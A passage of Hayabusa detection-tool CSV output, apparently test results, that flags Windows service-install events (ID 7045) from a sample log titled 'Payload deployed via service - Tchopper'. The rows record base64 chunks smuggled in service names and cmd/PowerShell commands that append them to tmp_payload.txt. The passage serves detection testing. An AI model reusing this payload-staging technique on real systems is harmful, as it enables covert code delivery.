+2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
